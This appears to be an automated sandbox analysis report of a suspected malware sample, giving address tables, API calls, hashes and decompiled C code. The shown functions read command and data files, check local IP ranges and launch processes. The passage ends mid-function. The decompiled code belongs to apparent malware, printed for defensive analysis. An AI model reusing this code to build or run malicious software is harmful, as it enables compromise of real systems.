                                                                                                                                                                                                                                                                                    0x00409ae7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409afb
                                                                                                                                                                                                                                                                                    0x00409b00
                                                                                                                                                                                                                                                                                    0x00409b03
                                                                                                                                                                                                                                                                                    0x00409b05
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b05
                                                                                                                                                                                                                                                                                    0x00409a7e
                                                                                                                                                                                                                                                                                    0x00409a83
                                                                                                                                                                                                                                                                                    0x00409a86
                                                                                                                                                                                                                                                                                    0x00409a88
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409a8f
                                                                                                                                                                                                                                                                                    0x00409a9c
                                                                                                                                                                                                                                                                                    0x00409aa1
                                                                                                                                                                                                                                                                                    0x00409aa4
                                                                                                                                                                                                                                                                                    0x00409aa6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409aa6
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409770: gethostname.WS2_32(?,00000100), ref: 0040978C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409770: gethostbyname.WS2_32(?), ref: 0040979E
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A60
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A7E
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: strstr$gethostbynamegethostname
                                                                                                                                                                                                                                                                                    • String ID: .10$.10.$.127$.127.$10.$127.
                                                                                                                                                                                                                                                                                    • API String ID: 2540993189-3303897403
                                                                                                                                                                                                                                                                                    • Opcode ID: b76f67e7926c3bfc2b6239aaaf97ef912ceb140556f2a3feeb29e46595fad57e
                                                                                                                                                                                                                                                                                    • Instruction ID: 3df5601b161af7dea13d6a0229968f945e0e067b118b08783a6fcb5bdca65d6d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b76f67e7926c3bfc2b6239aaaf97ef912ceb140556f2a3feeb29e46595fad57e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC51B4B8E043449BDB04EB61E841BAA7BB5AB44308F04C53EE904673C2D67EE951CB9D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409D40() {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				DWORD* _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				InitializeCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				while(_v12 < 0x200) {
                                                                                                                                                                                                                                                                                    					E00409A30( *((intOrPtr*)(0x4143b8 + _v12 * 4)), E0040BE60(), 0); // executed
                                                                                                                                                                                                                                                                                    					_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t39 = CreateFileW("C:\Users\Albus\tbnds.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v8 = _t39;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    							_v24 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							_v32 = 0;
                                                                                                                                                                                                                                                                                    							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                                                                                                                                                                                                                    								E00409A30( *((intOrPtr*)(_v20 + _v32 * 8)), E0040BE60() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                                                                                                                                                                                                                    								_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                                    								_v28 =  &(_v28[2]);
                                                                                                                                                                                                                                                                                    								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							UnmapViewOfFile(_v20);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					CloseHandle(_v8); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				E00409750(); // executed
                                                                                                                                                                                                                                                                                    				_t41 =  *0x416e10; // 0x1eb1d60
                                                                                                                                                                                                                                                                                    				_t42 = E0040BBA0(_t41, 0, E00409620, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				return _t42;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    0x00409d4b
                                                                                                                                                                                                                                                                                    0x00409d51
                                                                                                                                                                                                                                                                                    0x00409d63
                                                                                                                                                                                                                                                                                    0x00409d7f
                                                                                                                                                                                                                                                                                    0x00409d84
                                                                                                                                                                                                                                                                                    0x00409d60
                                                                                                                                                                                                                                                                                    0x00409d60
                                                                                                                                                                                                                                                                                    0x00409d9d
                                                                                                                                                                                                                                                                                    0x00409da3
                                                                                                                                                                                                                                                                                    0x00409daa
                                                                                                                                                                                                                                                                                    0x00409dc4
                                                                                                                                                                                                                                                                                    0x00409dcb
                                                                                                                                                                                                                                                                                    0x00409de3
                                                                                                                                                                                                                                                                                    0x00409dea
                                                                                                                                                                                                                                                                                    0x00409df8
                                                                                                                                                                                                                                                                                    0x00409dfb
                                                                                                                                                                                                                                                                                    0x00409e02
                                                                                                                                                                                                                                                                                    0x00409e1d
                                                                                                                                                                                                                                                                                    0x00409e4a
                                                                                                                                                                                                                                                                                    0x00409e4f
                                                                                                                                                                                                                                                                                    0x00409e11
                                                                                                                                                                                                                                                                                    0x00409e1a
                                                                                                                                                                                                                                                                                    0x00409e1a
                                                                                                                                                                                                                                                                                    0x00409e58
                                                                                                                                                                                                                                                                                    0x00409e58
                                                                                                                                                                                                                                                                                    0x00409e62
                                                                                                                                                                                                                                                                                    0x00409e62
                                                                                                                                                                                                                                                                                    0x00409e6c
                                                                                                                                                                                                                                                                                    0x00409e6c
                                                                                                                                                                                                                                                                                    0x00409e72
                                                                                                                                                                                                                                                                                    0x00409e84
                                                                                                                                                                                                                                                                                    0x00409e8a
                                                                                                                                                                                                                                                                                    0x00409e95

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416DF4,?,?,?,?,?,?,00406559), ref: 00409D4B
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00409D9D
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00409DBE
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00409DDD
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00409DF2
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00409E58
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00409E62
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00409E6C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: NtQuerySystemTime.NTDLL ref: 0040BE6A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: RtlTimeToSecondsSince1980.NTDLL ref: 0040BE78
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\tbnds.dat$Ye@
                                                                                                                                                                                                                                                                                    • API String ID: 439099756-3891025474
                                                                                                                                                                                                                                                                                    • Opcode ID: 1123c5289f363af0f8f140666ba4873a039637e46353943bec5018710259f365
                                                                                                                                                                                                                                                                                    • Instruction ID: 4dce5e276bdf20b80a38771717a09593e8b4a8e5598cf30a42ed89e5f557a98d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1123c5289f363af0f8f140666ba4873a039637e46353943bec5018710259f365
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4413F74E40308BBDB10DBA4DC4ABAEB774AB44704F208569F611772C2C7B96941CF9D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 265 4045f0-404622 InitializeCriticalSection CreateFileW 266 404715-404718 265->266 267 404628-404643 CreateFileMappingW 265->267 268 404649-404662 MapViewOfFile 267->268 269 40470b-40470f CloseHandle 267->269 270 404701-404705 CloseHandle 268->270 271 404668-40467a GetFileSize 268->271 269->266 270->269 272 40467d-404681 271->272 273 404683-40468a 272->273 274 4046f7-4046fb UnmapViewOfFile 272->274 275 40468c 273->275 276 40468e-4046a1 call 40b210 273->276 274->270 275->274 279 4046a3 276->279 280 4046a5-4046ba 276->280 279->274 281 4046ca-4046f5 call 4044e0 280->281 282 4046bc-4046c8 call 408c70 280->282 281->272 282->274
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E004045F0() {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				InitializeCriticalSection("(Z(");
                                                                                                                                                                                                                                                                                    				_t35 = CreateFileW("C:\Users\Albus\tbcmds.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v8 = _t35;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                                                    						return CloseHandle(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v16 == 0) {
                                                                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                                                                    						CloseHandle(_v12);
                                                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v20 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                                    					_v24 = _v16;
                                                                                                                                                                                                                                                                                    					while(_v20 != 0) {
                                                                                                                                                                                                                                                                                    						if(_v20 >= 0x100) {
                                                                                                                                                                                                                                                                                    							_t45 = E0040B210(_v24, _v24);
                                                                                                                                                                                                                                                                                    							_t67 = _t66 + 4;
                                                                                                                                                                                                                                                                                    							_v28 = _t45;
                                                                                                                                                                                                                                                                                    							if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    								_v20 = _v20 - 0x100;
                                                                                                                                                                                                                                                                                    								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                                                                                                                                                                                                                    									E004044E0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                                                                                                                                                                                                                    									_t66 = _t67 + 0x10;
                                                                                                                                                                                                                                                                                    									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								E00408C70(_v28);
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					UnmapViewOfFile(_v16);
                                                                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t35;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x004045fb
                                                                                                                                                                                                                                                                                    0x00404615
                                                                                                                                                                                                                                                                                    0x0040461b
                                                                                                                                                                                                                                                                                    0x00404622
                                                                                                                                                                                                                                                                                    0x0040463c
                                                                                                                                                                                                                                                                                    0x00404643
                                                                                                                                                                                                                                                                                    0x0040470b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040470f
                                                                                                                                                                                                                                                                                    0x0040465b
                                                                                                                                                                                                                                                                                    0x00404662
                                                                                                                                                                                                                                                                                    0x00404701
                                                                                                                                                                                                                                                                                    0x00404705
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404705
                                                                                                                                                                                                                                                                                    0x00404674
                                                                                                                                                                                                                                                                                    0x0040467a
                                                                                                                                                                                                                                                                                    0x0040467d
                                                                                                                                                                                                                                                                                    0x0040468a
                                                                                                                                                                                                                                                                                    0x00404692
                                                                                                                                                                                                                                                                                    0x00404697
                                                                                                                                                                                                                                                                                    0x0040469a
                                                                                                                                                                                                                                                                                    0x004046a1
                                                                                                                                                                                                                                                                                    0x004046ae
                                                                                                                                                                                                                                                                                    0x004046ba
                                                                                                                                                                                                                                                                                    0x004046e1
                                                                                                                                                                                                                                                                                    0x004046e6
                                                                                                                                                                                                                                                                                    0x004046f2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046f2
                                                                                                                                                                                                                                                                                    0x004046c0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046a3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040468c
                                                                                                                                                                                                                                                                                    0x004046fb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046fb
                                                                                                                                                                                                                                                                                    0x00404718

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32((Z(,?,?,?,?,?,00406523), ref: 004045FB
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00404615
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404636
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404655
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040466E
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 004046FB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00404705
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040470F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                                                    • String ID: (Z($C:\Users\user\tbcmds.dat
                                                                                                                                                                                                                                                                                    • API String ID: 3956458805-52147524
                                                                                                                                                                                                                                                                                    • Opcode ID: d9d6ccae4102e69466f14f4338cee386052dc7b428fa04fb1a9decc745564596
                                                                                                                                                                                                                                                                                    • Instruction ID: fde0418914d6c461a92172338520ab8504d9313cab43c149491a54f3197792e7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d6ccae4102e69466f14f4338cee386052dc7b428fa04fb1a9decc745564596
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 063145B4D40209FFDB14DBE4CC49FAEB774AB89704F208969E601772C0D7B96541CB59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 329 40d390-40d3ee memset CreateProcessW 330 40d3f0-40d3fd Sleep 329->330 331 40d3ff-40d423 ShellExecuteW 329->331 332 40d436-40d439 330->332 333 40d434 331->333 334 40d425-40d432 Sleep 331->334 333->332 334->332
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040D390(char _a4) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                    				struct _STARTUPINFOW _v100;
                                                                                                                                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				memset( &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                    				_v24.hProcess = 0;
                                                                                                                                                                                                                                                                                    				_v24.hThread = 0;
                                                                                                                                                                                                                                                                                    				_v24.dwProcessId = 0;
                                                                                                                                                                                                                                                                                    				_v24.dwThreadId = 0;
                                                                                                                                                                                                                                                                                    				_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                    				_v100.dwFlags = 1;
                                                                                                                                                                                                                                                                                    				_v100.wShowWindow = 5;
                                                                                                                                                                                                                                                                                    				_t11 =  &_a4; // 0x406227
                                                                                                                                                                                                                                                                                    				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                                                                                                                                                                                                                    				if(_t20 != 1) {
                                                                                                                                                                                                                                                                                    					_t12 =  &_a4; // 0x406227
                                                                                                                                                                                                                                                                                    					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					_v104 = _v8;
                                                                                                                                                                                                                                                                                    					if(_v104 <= 0x20) {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040d39e
                                                                                                                                                                                                                                                                                    0x0040d3a8
                                                                                                                                                                                                                                                                                    0x0040d3ab
                                                                                                                                                                                                                                                                                    0x0040d3ae
                                                                                                                                                                                                                                                                                    0x0040d3b1
                                                                                                                                                                                                                                                                                    0x0040d3b4
                                                                                                                                                                                                                                                                                    0x0040d3bb
                                                                                                                                                                                                                                                                                    0x0040d3c7
                                                                                                                                                                                                                                                                                    0x0040d3df
                                                                                                                                                                                                                                                                                    0x0040d3e5
                                                                                                                                                                                                                                                                                    0x0040d3ee
                                                                                                                                                                                                                                                                                    0x0040d405
                                                                                                                                                                                                                                                                                    0x0040d416
                                                                                                                                                                                                                                                                                    0x0040d41c
                                                                                                                                                                                                                                                                                    0x0040d423
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d434
                                                                                                                                                                                                                                                                                    0x0040d42a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d430
                                                                                                                                                                                                                                                                                    0x0040d3f5
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040D39E
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,'b@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040D3E5
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D3F5
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,'b@,00000000,00000000,00000000), ref: 0040D410
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D42A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                                                                                                                                                                                                                    • String ID: $'b@$D$open
                                                                                                                                                                                                                                                                                    • API String ID: 2222793131-3177583149
                                                                                                                                                                                                                                                                                    • Opcode ID: d69509e6999794d924fcff9b845599a7eb41f28983b1475a5e279ebf92cb692e
                                                                                                                                                                                                                                                                                    • Instruction ID: b11808ad886c3be21141a941b9f16766042708721ad172ccf90be75e59fbd376
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d69509e6999794d924fcff9b845599a7eb41f28983b1475a5e279ebf92cb692e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E211FE71E4430CBBEB14DF94DC46BDE7774AB18700F20412AFA09BA2C0D6B55A448B59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 335 40d1d0-40d211 CreateFileW 336 40d323-40d327 335->336 337 40d217-40d232 CreateFileMappingW 335->337 340 40d329-40d349 CreateFileW 336->340 341 40d37d-40d385 336->341 338 40d238-40d251 MapViewOfFile 337->338 339 40d319-40d31d CloseHandle 337->339 342 40d257-40d26d GetFileSize 338->342 343 40d30f-40d313 CloseHandle 338->343 339->336 344 40d371-40d37a call 408c70 340->344 345 40d34b-40d36b WriteFile CloseHandle 340->345 346 40d273-40d286 call 40b1e0 342->346 347 40d305-40d309 UnmapViewOfFile 342->347 343->339 344->341 345->344 346->347 352 40d288-40d297 346->352 347->343 352->347 353 40d299-40d2b9 call 40ab80 352->353 355 40d2be-40d2c8 353->355 355->347 356 40d2ca-40d2f0 call 4094c0 355->356 356->347 359 40d2f2-40d2fe call 408c70 356->359 359->347
                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E0040D1D0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				DWORD* _v20;
                                                                                                                                                                                                                                                                                    				char _v21;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				void* _t62;
